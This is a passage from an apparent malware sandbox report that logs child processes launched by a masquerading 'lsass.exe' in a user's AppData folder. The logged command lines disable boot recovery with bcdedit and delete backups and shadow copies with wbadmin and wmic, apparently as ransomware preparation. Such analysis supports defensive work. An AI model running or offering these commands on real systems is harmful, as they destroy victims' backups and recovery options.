Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:25 (UTC) True 1
Fn
Get Time type = Ticks, time = 149495 True 1
Fn
Get Time type = Performance Ctr, time = 20992826957 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #12: cmd.exe
56 0
»
Information Value
ID #12
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:29, Reason: Child Process
Unmonitor End Time: 00:01:30, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x930
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 968
Host Behavior
File (15)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 98 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a5f0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:25 (UTC) True 1
Fn
Get Time type = Ticks, time = 149651 True 1
Fn
Get Time type = Performance Ctr, time = 21008818586 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #13: cmd.exe
56 0
»
Information Value
ID #13
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:29, Reason: Child Process
Unmonitor End Time: 00:01:30, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x99c
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9B0
Host Behavior
File (15)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 98 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a3c0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:25 (UTC) True 1
Fn
Get Time type = Ticks, time = 149792 True 1
Fn
Get Time type = Performance Ctr, time = 21022087358 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #14: cmd.exe
56 0
»
Information Value
ID #14
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:30, Reason: Child Process
Unmonitor End Time: 00:01:30, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x9ec
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 984
Host Behavior
File (15)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 98 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a920000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:25 (UTC) True 1
Fn
Get Time type = Ticks, time = 149916 True 1
Fn
Get Time type = Performance Ctr, time = 21034768722 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #15: cmd.exe
56 0
»
Information Value
ID #15
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:30, Reason: Child Process
Unmonitor End Time: 00:01:30, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x9d4
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 994
Host Behavior
File (15)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 98 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a610000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:25 (UTC) True 1
Fn
Get Time type = Ticks, time = 150041 True 1
Fn
Get Time type = Performance Ctr, time = 21047712841 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #16: cmd.exe
56 0
»
Information Value
ID #16
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wbadmin delete backup
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:30, Reason: Child Process
Unmonitor End Time: 00:01:31, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x9c8
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9BC
Host Behavior
File (15)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 98 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a290000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:26 (UTC) True 1
Fn
Get Time type = Ticks, time = 150182 True 1
Fn
Get Time type = Performance Ctr, time = 21060794857 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #17: cmd.exe
58 0
»
Information Value
ID #17
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:30, Reason: Child Process
Unmonitor End Time: 00:01:33, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0x3d0
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A30
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
